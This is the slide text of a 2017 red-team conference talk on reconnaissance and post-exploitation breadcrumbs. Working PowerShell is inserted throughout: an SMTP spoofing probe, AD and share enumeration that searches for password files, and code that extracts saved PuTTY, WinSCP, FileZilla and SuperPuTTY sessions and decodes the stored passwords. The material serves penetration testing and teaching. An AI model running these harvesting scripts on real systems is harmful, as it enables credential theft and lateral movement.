Breadcrumbs to Loaves: BSides Austin '17

Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi

Often on red teams there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often found in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence can provide a map of the network that most companies don't know exists. We walk you step by step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.

Slide 1: Breadcrumbs to Loaves: How Tidbits of Information Lead Us to Full-Scale Compromise
Brandon Arvanaghi (@arvanaghi). Copyright © FireEye, Inc. All rights reserved.
Slide 2: Brandon Arvanaghi (@arvanaghi)
  • Security Consultant at Mandiant
  • Webshell detection, post-exploitation, sandbox detection tools
  • Researched automated attack plan generation at Vanderbilt University
Slide 3: Breadcrumbs
  • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation
  • Types of breadcrumbs:
    • Open Source Intelligence Gathering (OSINT)/External
    • Wireless
    • Internal (physical connection)
    • Post-exploitation (bulk of the talk)
  • SessionGopher: a tool I developed to discover Unix systems and jump boxes: https://github.com/fireeye/SessionGopher
Slide 4: OSINT/EXTERNAL BREADCRUMBS
Slide 5: Crumb #1: SPF Records
  • Sender Policy Framework
  • You own example.com
  • Problem: spoofing email from @example.com is easy: stand up a mail server and set the headers yourself
  • Solution: an SPF record in example.com's DNS zone that says "mail from @example.com should only come from the following IP addresses: ..."
  • Receiving mail servers now automatically check example.com's DNS to see whether the email's source IP is in the SPF record
Slide 6: Crumb #1: SPF Records
  • As an attacker, SPF records provide insight into third parties
  • Sometimes companies want third parties to be able to send mail on their behalf
  • E.g. LinkedIn trusting DocuSign to send email from its domain
  • https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records
  • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
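The third-party mapping the two SPF slides describe, as an added example that is not part of the talk: it walks a domain's SPF record, follows every `include:` and `redirect=` to the depth RFC 7208 allows, and returns one row per mechanism so the vendors show up as a list. The resolver is a scriptblock so the walk runs offline against the constructed zone below (placeholder names and documentation IP ranges, not real records); the commented live variant uses `Resolve-DnsName`.

```powershell
# Added example: expand an SPF record and list the third parties it authorises to send as the domain.
function Expand-Spf {
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][scriptblock]$Resolver,   # { param($name) returns the TXT strings for $name }
        [int]$Depth = 0,
        [System.Collections.Generic.HashSet[string]]$Seen = [System.Collections.Generic.HashSet[string]]::new()
    )
    # RFC 7208 allows at most 10 DNS-querying terms per check; the Seen set also stops include loops
    if ($Depth -gt 10 -or -not $Seen.Add($Domain)) { return }
    $record = @(& $Resolver $Domain) | Where-Object { $_ -match '^v=spf1(\s|$)' } | Select-Object -First 1
    if (-not $record) { return }
    foreach ($term in (($record -split '\s+') | Select-Object -Skip 1)) {
        $mech = $term -replace '^[+\-~?]', ''          # drop the pass/fail/softfail/neutral qualifier
        switch -Regex ($mech) {
            '^include:(.+)$' {
                $target = $Matches[1]
                [pscustomobject]@{ Domain = $Domain; Mechanism = 'include'; Value = $target; Depth = $Depth }
                Expand-Spf -Domain $target -Resolver $Resolver -Depth ($Depth + 1) -Seen $Seen
                break
            }
            '^redirect=(.+)$' {
                $target = $Matches[1]
                [pscustomobject]@{ Domain = $Domain; Mechanism = 'redirect'; Value = $target; Depth = $Depth }
                Expand-Spf -Domain $target -Resolver $Resolver -Depth ($Depth + 1) -Seen $Seen
                break
            }
            '^(ip4|ip6|a|mx|exists|ptr)(?::(.*))?$' {
                [pscustomobject]@{ Domain = $Domain; Mechanism = $Matches[1]; Value = $Matches[2]; Depth = $Depth }
                break
            }
            '^all$' {
                [pscustomobject]@{ Domain = $Domain; Mechanism = $term; Value = ''; Depth = $Depth }
                break
            }
        }
    }
}

# Constructed zone (placeholder names, RFC 5737 address ranges): example.com lets two vendors send as it
$zone = @{
    'example.com'                   = @('google-site-verification=abc123',
                                        'v=spf1 mx include:_spf.mailvendor.example include:spf.esign.example ip4:203.0.113.0/24 -all')
    '_spf.mailvendor.example'       = @('v=spf1 include:_netblocks.mailvendor.example ~all')
    '_netblocks.mailvendor.example' = @('v=spf1 ip4:198.51.100.0/24 ~all')
    'spf.esign.example'             = @('v=spf1 ip4:192.0.2.0/24 -all')
}
$offline = { param($name) if ($zone.ContainsKey($name)) { $zone[$name] } else { @() } }.GetNewClosure()

Expand-Spf -Domain 'example.com' -Resolver $offline | Format-Table -AutoSize
# The third parties are the include/redirect targets at any depth
Expand-Spf -Domain 'example.com' -Resolver $offline |
    Where-Object { $_.Mechanism -in 'include', 'redirect' } |
    Select-Object -ExpandProperty Value -Unique

# Live lookups instead of the constructed zone:
# $live = { param($name) Resolve-DnsName -Name $name -Type TXT -ErrorAction SilentlyContinue | ForEach-Object { $_.Strings -join '' } }
# Expand-Spf -Domain 'target.example' -Resolver $live
```

The `ip4`/`ip6` rows matter too: a netblock that is not the target's own is usually a hosting or mail-filtering provider, and a `+all` or `?all` terminator means the record is not worth bypassing in the first place.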
Slide 7: Crumb #2: Subsidiaries
  • A company is only as strong as its weakest link
  • Mergers and acquisitions
  • Due diligence
  • Cyber insurance
Slide 9: Crumb #3: Unauthenticated SMTP Server
  • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail through that server to internal employees
  • Without authentication, you can spoof any internal email address!
  • http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
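The check behind this crumb, as an added example (not from the talk): it speaks raw SMTP to the server, forges an internal sender, names an internal recipient, and stops after `RCPT TO`, resetting the session so nothing is delivered. The server's reply codes are the finding. Server, sender and recipient below are placeholders.

```powershell
# Added example: does this SMTP server accept a forged internal sender without authentication?
function Read-SmtpReply([System.IO.StreamReader]$Reader) {
    # A reply is zero or more "NNN-" continuation lines followed by one "NNN " line (RFC 5321 4.2.1)
    $lines = @()
    try {
        do {
            $line = $Reader.ReadLine()
            if ($null -eq $line) { break }
            $lines += $line
        } while ($line -match '^\d{3}-')
    } catch [System.IO.IOException] { }     # read timeout or connection dropped by the server
    return ,$lines
}

function Test-SmtpSenderSpoofing {
    param(
        [Parameter(Mandatory)][string]$Server,
        [int]$Port = 25,
        [Parameter(Mandatory)][string]$From,   # the internal address to impersonate
        [Parameter(Mandatory)][string]$To,     # an internal mailbox
        [string]$HeloName = 'probe.example.net',
        [int]$TimeoutMs = 5000
    )
    $client = New-Object System.Net.Sockets.TcpClient
    $client.ReceiveTimeout = $TimeoutMs
    $transcript = @()
    $codes = [ordered]@{}
    try {
        $client.Connect($Server, $Port)
        $stream = $client.GetStream()
        $reader = New-Object System.IO.StreamReader($stream, [System.Text.Encoding]::ASCII)
        $writer = New-Object System.IO.StreamWriter($stream, [System.Text.Encoding]::ASCII)
        $writer.NewLine = "`r`n"
        $writer.AutoFlush = $true

        foreach ($l in (Read-SmtpReply $reader)) { $transcript += "S: $l" }       # banner
        foreach ($cmd in @("EHLO $HeloName", "MAIL FROM:<$From>", "RCPT TO:<$To>")) {
            $writer.WriteLine($cmd)
            $transcript += "C: $cmd"
            $reply = Read-SmtpReply $reader
            foreach ($l in $reply) { $transcript += "S: $l" }
            $verb = $cmd.Split(' ')[0]
            $codes[$verb] = if ($reply.Count -and $reply[-1] -match '^(\d{3})') { $Matches[1] } else { 'none' }
            if ($reply.Count -eq 0) { break }
        }
        # Never send DATA: RSET discards the envelope, QUIT closes cleanly
        foreach ($cmd in 'RSET', 'QUIT') {
            $writer.WriteLine($cmd); $transcript += "C: $cmd"
            Read-SmtpReply $reader | Out-Null
        }
    } finally {
        $client.Close()
    }
    [pscustomobject]@{
        Server            = "$Server`:$Port"
        Ehlo              = $codes['EHLO']
        MailFrom          = $codes['MAIL']
        RcptTo            = $codes['RCPT']
        AcceptsForgedMail = ($codes['MAIL'] -eq '250' -and $codes['RCPT'] -eq '250')
        Transcript        = $transcript
    }
}

# Usage (needs network reach to the target; placeholders):
# $r = Test-SmtpSenderSpoofing -Server 'mail.corp.example' -From 'ceo@corp.example' -To 'helpdesk@corp.example'
# $r | Select-Object Server, MailFrom, RcptTo, AcceptsForgedMail
# $r.Transcript
```

A `250` to both `MAIL FROM` and `RCPT TO` means anyone who can reach port 25 can mail staff as the CEO. A `530` (authentication required) or a `550`/`553` rejecting the sender is the fixed state. Servers that answer `530 Must issue a STARTTLS command first` need the same exchange repeated inside TLS, which this probe does not do; a fixed server still rejects the forged sender after STARTTLS.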
Slide 10: INTERNAL BREADCRUMBS
Slide 11: Crumb #1: LLMNR
  • LLMNR = Link-Local Multicast Name Resolution
  • Hosts on the same link (subnet) can answer name queries for each other, instead of relying only on the DNS server
  • Peer-to-peer, decentralized
  • Fast
  • Multicast
  • Implicitly trusts everyone who answers
  • Responder by SpiderLabs
Slides 12-14: Unicast example (diagram). The PC sends a standard DNS query to the DNS server, the server answers with 10.0.30.15, and the PC connects to 10.0.30.15.
Slides 15-17: Multicast example (diagram). The PC asks everyone on the link "Where's confluence.corp.com?"; whoever answers "That's me! 10.1.40.15, come over!" is believed, and the PC connects to 10.1.40.15.
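The multicast exchange in the diagrams, built by hand as an added example (not from the talk or from Responder): it sends one LLMNR query to 224.0.0.252:5355 for a name nobody owns and reports every host that answers. A legitimate host only answers for its own name, so any reply to a random name is a poisoner of the kind Responder implements. LLMNR reuses the DNS message format (RFC 4795), which is what the packet builder assumes; run it on the segment under test.

```powershell
# Added example: one LLMNR query, then collect who claims the name.
function Send-LlmnrQuery {
    param(
        [Parameter(Mandatory)][string]$Name,
        [int]$TimeoutMs = 2000
    )
    # Header: ID, flags 0x0000 (standard query), QDCOUNT 1, ANCOUNT/NSCOUNT/ARCOUNT 0
    $id  = Get-Random -Minimum 1 -Maximum 65535
    $pkt = New-Object System.Collections.Generic.List[byte]
    $pkt.AddRange([byte[]]@(($id -shr 8), ($id -band 0xFF), 0, 0, 0, 1, 0, 0, 0, 0, 0, 0))
    foreach ($label in $Name.Split('.')) {               # QNAME as length-prefixed labels
        $lb = [System.Text.Encoding]::ASCII.GetBytes($label)
        $pkt.Add([byte]$lb.Length)
        $pkt.AddRange($lb)
    }
    $pkt.AddRange([byte[]]@(0, 0, 1, 0, 1))             # root label, QTYPE A, QCLASS IN
    $query = $pkt.ToArray()

    $udp = New-Object System.Net.Sockets.UdpClient
    $udp.Client.ReceiveTimeout = $TimeoutMs
    $from = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, 0)
    $answers = @()
    try {
        [void]$udp.Send($query, $query.Length, '224.0.0.252', 5355)   # LLMNR IPv4 multicast group
        while ($true) {
            $data = $udp.Receive([ref]$from)               # SocketException once the timeout expires
            if ($data.Length -lt 12) { continue }
            $rid     = ([int]$data[0] -shl 8) -bor $data[1]
            $isReply = ($data[2] -band 0x80) -ne 0         # QR bit
            $ancount = ([int]$data[6] -shl 8) -bor $data[7]
            if ($rid -ne $id -or -not $isReply) { continue }   # not an answer to our query
            $answers += [pscustomobject]@{
                Query       = $Name
                Responder   = $from.Address.ToString()      # the poisoner's address is the source IP
                AnswerCount = $ancount
            }
        }
    } catch [System.Net.Sockets.SocketException] {
        # timeout: no more replies
    } finally {
        $udp.Close()
    }
    return $answers
}

# A name nobody legitimately owns; anything that claims it is poisoning the segment
$canary = 'fileshare-' + [guid]::NewGuid().ToString('N').Substring(0, 8)
$hits = Send-LlmnrQuery -Name $canary
if ($hits) { $hits | Format-Table -AutoSize } else { "No LLMNR answer for $canary within the timeout" }
```

Querying a real hostname instead of the canary shows the intended behaviour: only that host answers. The fix is to turn multicast name resolution off (the "Turn off multicast name resolution" policy, which sets `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast` to 0), after which the canary query gets no answer even from a poisoned segment because the clients stop asking.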
Slide 18: Crumb #2: IT HelpDesk/Intranet
  • Company helpdesk sites often lack authentication
  • Real examples from engagements:
    • "Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3"
    • An Excel file storing Unix system passwords
Slide 19: Crumb #2: IT HelpDesk/Intranet
  1. Nmap scan across subnets
  2. Run EyeWitness by Christopher Truncer against the results (it screenshots every web service found)
Slide 20: Crumb #3: Anonymous Shares
  • Publicly available shared folders that do not require any form of authentication
  • Often exist out of perceived necessity (contractors, vendors)
  • Result: plaintext password files
Slide 21: Crumb #4: When Hostnames Make Sense
  • Use PowerView or ADExplorer to get lists of hostnames from Active Directory
  • Nonintrusive way to understand the role of each system without running Nmap scans
  • SQLWIN7.CORP.COM
  • MAIL01.CORP.COM
  • MEDIA-BKUP.CORP.COM
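The two internal crumbs above (share enumeration and role-by-hostname), as an added example that is not from the talk and is not PowerView: it pulls computer objects straight from LDAP with the built-in `[adsisearcher]`, guesses each machine's role from its name, then lists the shares each one exposes and whether the current context can read them. Any domain user can run the LDAP part and nothing has to be dropped on disk. The role table is a hypothetical starting point to be extended with the customer's own naming convention.

```powershell
# Added example: hostnames from AD, roles from naming patterns, then share visibility per host.
function Get-DomainComputerRole {
    param([string]$LdapFilter = '(objectCategory=computer)')
    $roles = [ordered]@{                       # regex -> role; first match wins
        'SQL|DB'          = 'Database'
        'MAIL|EXCH'       = 'Mail'
        'BKUP|BACKUP'     = 'Backup'
        '^DC\d|PDC'       = 'Domain controller'
        'JUMP|BASTION'    = 'Jump box'
        'POS'             = 'Point of sale'
        'WIN7|WIN10|WKS'  = 'Workstation'
    }
    $searcher = [adsisearcher]$LdapFilter
    $searcher.PageSize = 1000                  # page the results, or large domains stop at 1000
    foreach ($p in 'dnshostname', 'operatingsystem') { [void]$searcher.PropertiesToLoad.Add($p) }
    foreach ($r in $searcher.FindAll()) {
        $fqdn = if ($r.Properties['dnshostname'].Count) { [string]$r.Properties['dnshostname'][0] } else { '' }
        $os   = if ($r.Properties['operatingsystem'].Count) { [string]$r.Properties['operatingsystem'][0] } else { '' }
        if (-not $fqdn) { continue }
        $short = $fqdn.Split('.')[0]
        $role = 'Unknown'
        foreach ($pattern in $roles.Keys) { if ($short -match $pattern) { $role = $roles[$pattern]; break } }
        [pscustomobject]@{ ComputerName = $fqdn; OS = $os; Role = $role }
    }
}

function Get-ReadableShare {
    param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$ComputerName)
    process {
        # "net view" lists the non-hidden shares; share names are the first column under the dashed line
        $out = & net.exe view "\\$ComputerName" 2>$null
        if ($LASTEXITCODE -ne 0) { return }    # offline, access denied, or no shares
        $inTable = $false
        foreach ($line in $out) {
            if ($line -match '^-{5,}') { $inTable = $true; continue }
            if (-not $inTable) { continue }
            if ($line -notmatch '\S' -or $line -match '^The command completed') { break }
            $share = ($line -split '\s{2,}')[0].Trim()
            $unc = "\\$ComputerName\$share"
            [pscustomobject]@{
                ComputerName = $ComputerName
                Share        = $share
                Readable     = [bool](Test-Path -LiteralPath $unc -ErrorAction SilentlyContinue)
                # Cheap triage of what the slides found: spreadsheets and anything named like a password file
                Interesting  = @(Get-ChildItem -LiteralPath $unc -ErrorAction SilentlyContinue |
                                    Where-Object { $_.Name -match 'pass|pwd|cred|\.xlsx?$' } |
                                    Select-Object -ExpandProperty Name)
            }
        }
    }
}

# Usage (needs a domain-joined context):
# $hosts = Get-DomainComputerRole
# $hosts | Group-Object Role | Select-Object Name, Count
# $hosts | Where-Object Role -ne 'Workstation' | Get-ReadableShare | Where-Object Readable
```

Run as a domain user this answers "what can any authenticated user read", which is the usual finding. For a true anonymous test of the shares, run the share half from a box that is not domain-joined (or after `net use \\host\IPC$ "" /user:""`), so that only null-session access is exercised.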
Slide 22: WIRELESS BREADCRUMBS
Slide 23: Crumb #1: Guest Network Host Visibility
  • Guest networks should be segregated. This is not always done properly.
  • Visible hosts with visible services can lead to lateral movement onto the corporate network
  • Pivot!
Slide 24: Crumb #2: Remembered Networks
  • Your device probes for every access point it remembers having associated with
  • Yells out known SSID names indiscriminately
  • A WiFi Pineapple responds to any probe, so your device connects automatically
  • It then forwards your traffic to the internet while reading all unencrypted traffic
  • Quietly downgrading HTTPS requests to HTTP
Slides 25-28: Remembered Networks: Real Mandiant Engagement (screenshots). A device associated with the rogue access point while visible to two different networks; from there: PsExec, WMIExec, etc.
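An audit of the remembered-networks crumb from the defender's side, as an added example (not from the talk): it lists the Wi-Fi profiles a Windows laptop carries and flags the ones a rogue access point can impersonate most cheaply. Open networks need no key to impersonate, and profiles set to connect even when the SSID is not broadcast are the ones Windows actively probes for by name. It parses the English output of `netsh`; other locales need the labels changed.

```powershell
# Added example: which saved Wi-Fi profiles make this laptop an easy evil-twin target?
function Get-NetshField([string[]]$Lines, [string]$Label) {
    foreach ($l in $Lines) {
        if ($l -match "^\s*$Label\s*:\s*(.+)$") { return $Matches[1].Trim() }
    }
    return ''
}

function Get-RememberedWifiProfile {
    $names = & netsh.exe wlan show profiles | ForEach-Object {
        if ($_ -match '^\s*All User Profile\s*:\s*(.+)$') { $Matches[1].Trim() }
    }
    foreach ($name in $names) {
        $detail = & netsh.exe wlan show profile name="$name"
        $auth   = Get-NetshField $detail 'Authentication'
        $mode   = Get-NetshField $detail 'Connection mode'
        $bcast  = Get-NetshField $detail 'Network broadcast'
        $open   = $auth -match '^Open'                 # no key: any AP with the same SSID will do
        $auto   = $mode -match 'automatically'         # joins without asking
        $hidden = $bcast -match 'not broadcasting'     # Windows sends directed probes for these
        $risk = 'Low'
        if ($open -or $hidden) { $risk = 'Medium' }
        if ($open -and ($auto -or $hidden)) { $risk = 'High' }
        [pscustomobject]@{
            Profile          = $name
            Authentication   = $auth
            AutoConnect      = $auto
            ProbesHiddenSsid = $hidden
            Risk             = $risk
        }
    }
}

Get-RememberedWifiProfile |
    Sort-Object { @{ High = 0; Medium = 1; Low = 2 }[$_.Risk] } |
    Format-Table -AutoSize
# Clean-up for a stale open profile: netsh wlan delete profile name="<Profile>"
```

The hotel and airport profiles are the usual High rows: open, set to auto-connect, and never deleted. A WPA2 profile is still impersonable when the attacker knows the PSK, which for guest networks is often printed on the wall.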
Slide 30: POST-EXPLOITATION. SessionGopher: Finding Unix Systems and Jump Boxes: https://github.com/fireeye/SessionGopher
Slide 31: The Registry
  • On many engagements, consultants are tasked with exploiting Unix systems
    • Intellectual property on MacBook Pros
    • Point of sale terminals running Linux
    • Etc.
  • Often not domain-joined!
    • It would be so much easier if they were: just use PowerView
  • How can we find and exploit them?
Slide 32: The Registry
  • Current methodology:
    1. Nmap for live hosts not found in Active Directory, looking for open Unix ports
    2. Run netstat on domain-joined systems and look for active connections over Unix ports
    3. Search Active Directory for groups like "Linux Admins" and "Mac Admins", then find their members' workstations and active sessions
  • This methodology relies on luck and on active sessions. Is there a better way?
Slide 33: The Registry
  • HKEY_USERS
  • Persistent storage of saved sessions for every user whose hive is loaded on the machine, not just the user currently at the console
  • Though Unix systems are not domain-joined, they are often managed from domain-joined Windows systems
  • Valuable artifacts on these hosts
  • Solves our "active session" problem
  • But what can we find in this hive that helps us exploit Unix systems?
Slide 34: The Registry (screenshot)
Slide 35: Solution
  1. Find artifacts left by tools typically used to access Unix systems.
  2. If they exist, saved sessions might exist too. Extract them.
Slide 36: Tools
  • WinSCP
  • FileZilla
  • PuTTY
  • SuperPuTTY
  • VNC
  • RDP
  • More!
Slide 37: Paths to Sessions Stored in the Registry
  • PuTTY: HKEY_USERS\<SID>\SOFTWARE\SimonTatham\PuTTY\Sessions
  • WinSCP: HKEY_USERS\<SID>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
  • Microsoft Remote Desktop: HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Non-registry (assumes filename/location unchanged):
  • FileZilla: <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
  • SuperPuTTY: <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
Slide 38: WinSCP
  • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions\<SessionName>
  • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Configuration\Security
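The registry walk the last few slides describe, as an added example that is not SessionGopher's own code: it reads PuTTY and WinSCP saved sessions from every user hive loaded under HKEY_USERS and decodes WinSCP's obfuscated `Password` values. The decoder reimplements WinSCP's published "simple" scheme (hex pairs, XOR with 0xA3, bitwise NOT, the plaintext prefixed with username+hostname); when `Configuration\Security\UseMasterPassword` is 1 the stored value is not recoverable this way. The encoded string in the self-check was produced with that scheme from placeholder values and is not a real capture. One caveat the slides gloss over: only loaded hives appear under HKEY_USERS, so a user who has not logged on since boot needs their `NTUSER.DAT` loaded with `reg load` first.

```powershell
# Added example: PuTTY and WinSCP saved sessions for every loaded user hive, WinSCP passwords decoded.
function Unprotect-WinScpPassword {
    param(
        [Parameter(Mandatory)][string]$HostName,
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Encoded       # the hex string in the session's "Password" value
    )
    $magic = 0xA3; $flag = 0xFF
    $key = $UserName + $HostName
    # hex pair -> byte, then undo the obfuscation: b = NOT(byte XOR 0xA3)
    $bytes = @(for ($i = 0; $i + 1 -lt $Encoded.Length; $i += 2) {
        (-bnot ([Convert]::ToByte($Encoded.Substring($i, 2), 16) -bxor $magic)) -band 0xFF
    })
    if ($bytes.Count -lt 2) { return $null }
    $idx = 0
    $first = $bytes[$idx]; $idx++
    if ($first -eq $flag) {                           # current format: flag, dummy, length
        $idx++
        $length = $bytes[$idx]; $idx++
    } else {                                          # legacy format: first byte is the length
        $length = $first
    }
    $skip = $bytes[$idx]; $idx++                      # count of random padding bytes to skip
    $idx += $skip
    if ($length -eq 0) { return '' }
    if ($idx + $length -gt $bytes.Count) { return $null }   # truncated, or not this scheme
    $plain = -join ($bytes[$idx..($idx + $length - 1)] | ForEach-Object { [char]$_ })
    if ($first -eq $flag) {
        # stored as key + password; a key mismatch means wrong user/host or a master password
        if (-not $plain.StartsWith($key)) { return $null }
        $plain = $plain.Substring($key.Length)
    }
    return $plain
}

function Get-SavedUnixSession {
    $hives = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' }
    foreach ($hive in $hives) {
        $sid = $hive.PSChildName
        # PuTTY: one key per session, names URL-encoded ("my%20box")
        $putty = Join-Path $hive.PSPath 'Software\SimonTatham\PuTTY\Sessions'
        foreach ($s in (Get-ChildItem $putty -ErrorAction SilentlyContinue)) {
            $p = Get-ItemProperty $s.PSPath
            [pscustomobject]@{
                Sid = $sid; Tool = 'PuTTY'; Session = [uri]::UnescapeDataString($s.PSChildName)
                Host = $p.HostName; User = $p.UserName; Port = $p.PortNumber; Secret = $p.PublicKeyFile
            }
        }
        # WinSCP: same layout, plus an obfuscated Password unless a master password is in use
        $winscp = Join-Path $hive.PSPath 'Software\Martin Prikryl\WinSCP 2'
        $sec = Get-ItemProperty (Join-Path $winscp 'Configuration\Security') -ErrorAction SilentlyContinue
        foreach ($s in (Get-ChildItem (Join-Path $winscp 'Sessions') -ErrorAction SilentlyContinue)) {
            $p = Get-ItemProperty $s.PSPath
            $secret = $null
            if ($p.Password) {
                $secret = if ($sec.UseMasterPassword -eq 1) { '<master password set>' }
                          else { Unprotect-WinScpPassword -HostName $p.HostName -UserName $p.UserName -Encoded $p.Password }
            }
            [pscustomobject]@{
                Sid = $sid; Tool = 'WinSCP'; Session = [uri]::UnescapeDataString($s.PSChildName)
                Host = $p.HostName; User = $p.UserName; Port = $p.PortNumber; Secret = $secret
            }
        }
    }
}

# Self-check on a constructed value (user "root", host "10.0.30.15"): decodes to "s3cret"
Unprotect-WinScpPassword -HostName '10.0.30.15' -UserName 'root' -Encoded 'A35C485C2E3333286D6C726C726F6C726D692F6F3F2E3928'
Get-SavedUnixSession | Format-Table -AutoSize
```

For PuTTY the `Secret` column is the path of the `.ppk` the session uses, which is the next crumb: an unencrypted key file there is a one-click login, as the `.ppk` slide notes.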
Slide 40: WinSCP (screenshot)
Slide 41: Paths to Sessions
  • HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default
  • HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Slide 42: FileZilla: <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml
Slide 43: SuperPuTTY: <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
  • The ExtraArgs field can contain a plaintext password
Slide 44: PuTTY .ppk Files
  • One-click PuTTY logins
  • The private key can be stored in plaintext (as here) or encrypted with a passphrase
Slide 45: Microsoft .rdp Files
  • Double-clicking one launches the connection, but the file is plain text and can be read by dragging it into a text editor
  • Plethora of arguments, many optional: host, whether to request an admin session, whether to prompt for credentials, etc.
  • Format: Fieldname:TypeOfField:Value
  • TypeOfField = i (integer) or s (string)
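Parsers for the three on-disk session stores covered by the FileZilla, SuperPuTTY and `.rdp` slides, as an added example (not from the talk or from SessionGopher). Each runs over a constructed sample in the real file layout; hostnames, users and secrets are placeholders, and the `.rdp` password field is a truncated DPAPI blob header, not a real credential.

```powershell
# Added example: sitemanager.xml, SuperPuTTY Sessions.xml and .rdp files, normalised to one shape.
function Get-ChildText([System.Xml.XmlNode]$Node, [string]$Name) {
    $c = $Node.SelectSingleNode($Name)
    if ($c) { $c.InnerText } else { $null }
}

function ConvertFrom-FileZillaSiteManager([Parameter(Mandatory)][xml]$Xml) {
    foreach ($s in $Xml.SelectNodes('//Server')) {
        $passNode = $s.SelectSingleNode('Pass')
        $secret = $null
        if ($passNode) {
            # FileZilla 3.26+ writes <Pass encoding="base64">; older builds stored it in the clear
            $secret = if ($passNode.GetAttribute('encoding') -eq 'base64') {
                [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($passNode.InnerText))
            } else { $passNode.InnerText }
        }
        [pscustomobject]@{
            Source = 'FileZilla'
            Name   = Get-ChildText $s 'Name'
            Host   = Get-ChildText $s 'Host'
            Port   = Get-ChildText $s 'Port'
            User   = Get-ChildText $s 'User'
            Secret = $secret
        }
    }
}

function ConvertFrom-SuperPuttySessions([Parameter(Mandatory)][xml]$Xml) {
    foreach ($s in $Xml.SelectNodes('//SessionData')) {
        # ExtraArgs is handed to putty.exe verbatim, so "-pw <password>" sits in the file in the clear
        $extra  = $s.GetAttribute('ExtraArgs')
        $secret = if ($extra -match '(?:^|\s)-pw\s+(\S+)') { $Matches[1] } else { $null }
        [pscustomobject]@{
            Source = 'SuperPuTTY'
            Name   = $s.GetAttribute('SessionName')
            Host   = $s.GetAttribute('Host')
            Port   = $s.GetAttribute('Port')
            User   = $s.GetAttribute('Username')
            Secret = $secret
        }
    }
}

function ConvertFrom-RdpFile([Parameter(Mandatory)][string[]]$Lines) {
    # name:type:value per line; type i = integer, s = string, b = binary (hex). Names may contain spaces.
    $fields = [ordered]@{}
    foreach ($line in $Lines) {
        if ($line -match '^([^:]+):([isb]):(.*)$') {
            $name, $type, $value = $Matches[1], $Matches[2], $Matches[3]
            $fields[$name] = if ($type -eq 'i') { [int]$value } else { $value }
        }
    }
    $target = [string]$fields['full address']
    $port   = if ($target -match '^(.+):(\d+)$') { $target = $Matches[1]; [int]$Matches[2] } else { 3389 }
    [pscustomobject]@{
        Source       = 'RDP'
        Name         = $fields['full address']
        Host         = $target
        Port         = $port
        User         = $fields['username']
        # "password 51:b:" is a DPAPI blob; only the saving user, on the saving machine, can unprotect it
        Secret       = if ($fields.Contains('password 51')) { '<DPAPI-protected blob>' } else { $null }
        AdminSession = ($fields['administrative session'] -eq 1)
    }
}

# Constructed samples in the real layouts (placeholders, not captures)
$fileZillaSample = @'
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.30.0" platform="windows">
  <Servers>
    <Server>
      <Host>10.0.30.15</Host><Port>22</Port><Protocol>1</Protocol>
      <User>deploy</User><Pass encoding="base64">czNjcmV0</Pass><Logontype>1</Logontype>
      <Name>prod-sftp</Name>
    </Server>
  </Servers>
</FileZilla3>
'@
$superPuttySample = @'
<?xml version="1.0" encoding="utf-8"?>
<ArrayOfSessionData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SessionData SessionId="Unix/jump01" SessionName="jump01" Host="10.0.30.16" Port="22" Proto="SSH" PuttySession="Default Settings" Username="ops" ExtraArgs="-pw Winter2017!" />
</ArrayOfSessionData>
'@
$rdpSample = @'
full address:s:ts01.corp.example:3389
username:s:CORP\jdoe
administrative session:i:1
prompt for credentials:i:0
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB
'@

@(ConvertFrom-FileZillaSiteManager $fileZillaSample) +
@(ConvertFrom-SuperPuttySessions $superPuttySample) +
@(ConvertFrom-RdpFile ($rdpSample -split "`r?`n")) |
    Format-Table Source, Name, Host, Port, User, Secret, AdminSession -AutoSize
# Real locations: "$env:APPDATA\FileZilla\sitemanager.xml", "$env:USERPROFILE\Documents\SuperPuTTY\Sessions.xml",
# and Get-ChildItem $env:USERPROFILE -Recurse -Filter *.rdp
```

The `.rdp` row is the one that does not hand over a secret: the saved password is DPAPI-protected under the saving user's logon, so it is only usable by running `mstsc` in that user's context on that machine, which is exactly what a session on a jump box gives you.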
Slide 48: Windows Management Instrumentation (WMI)
  • Rather than running SessionGopher on each computer (impractical), we can use WMI
  • Built-in Invoke-WmiMethod cmdlet in PowerShell
  • Remote registry querying ability (the StdRegProv class)
Slide 50: Write to CSV (Invoke-SessionGopher -o)
  • Create a map of the network's management relationships
  • Aggregate all session data across the entire domain or a targeted set of computers
  • Essentially, see the physical infrastructure of the network!
